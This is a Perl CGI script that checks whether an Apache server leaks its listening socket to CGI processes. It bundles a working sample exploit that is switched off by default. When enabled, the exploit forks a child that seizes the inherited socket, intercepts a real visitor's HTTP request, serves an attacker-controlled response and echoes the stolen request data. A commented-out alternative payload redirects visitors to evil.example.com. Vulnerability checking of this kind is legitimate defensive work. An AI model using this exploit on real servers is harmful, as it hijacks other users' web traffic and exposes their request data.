#!/usr/bin/perl -w
# Apache APR File Handle Inheritance test
# Note: This requires mod_perl for accurate test results.
# Version 1.0 - initial release
# Version 1.1 - fixed a condition that led to false positives
use strict;
use IO::Socket;
# By default this script will only test for the vulnerability
# If you want to run the sample exploit, change this value to 1;
my $do_exploit = 0;
my $payload_response = "HTTP/1.1 200 OK
Content-type: text/html
Success!
Success!
This http request was stolen from apache and was instead served by:
$0
";
# or, an alternative payload that does a redirect.
# $payload_response = "HTTP/1.1 302 Found\nLocation: http://evil.example.com/page.htm\n\n";
# This is not the payload!
print "Content-type: text/html\n\nApache APR Exploit Test\n\n";
my $sock;
my $i;
my $client;
my $buf;
my $link_target;
my @sockets;
my $vulnerable = 0;
foreach $i (0..1000) {
if (-e "/proc/$$/fd/$i") {
$link_target = readlink "/proc/$$/fd/$i";
print "$i: $link_target";
if ($i == 0) { print " (STDIN)"; }
if ($i == 1) { print " (STDOUT)"; }
if ($i == 2) { print " (STDERR)"; }
if (($i > 2) && ($link_target =~ /^socket:/)) {
push(@sockets,$i);
if ($i == 3) { $vulnerable = 1; }
}
print "
\n";
}
}
if ($do_exploit) {
my $pid = fork();
if (not defined $pid) {
print "ERROR: resources not avilable to fork
\n";
} elsif ($pid == 0) {
foreach $i (($sockets[0])) {
$sock = IO::Socket->new_from_fd($i, "w");
if ($sock) {
$client = $sock->accept();
if ($client) {
$client->recv($buf, 4096);
print $client $payload_response;
$buf =~ s/\n/\n
/g;
print $client "Stole a request:
\n";
print $client "Data received from client:
$buf
\n";
close ($client);
exit 0;
}
}
}
} else {
print "Malicious Child Launched
\n";
print "Listening on socket handle number $sockets[0]\n";
print "forked off PID number $pid to steal a request
\n";
}
}
if ($vulnerable) {
print "THIS SERVER IS VULNERABLE
\n";
} else {
print "This server is not vulnerable
\n";
}
# This is not the payload!
print "
";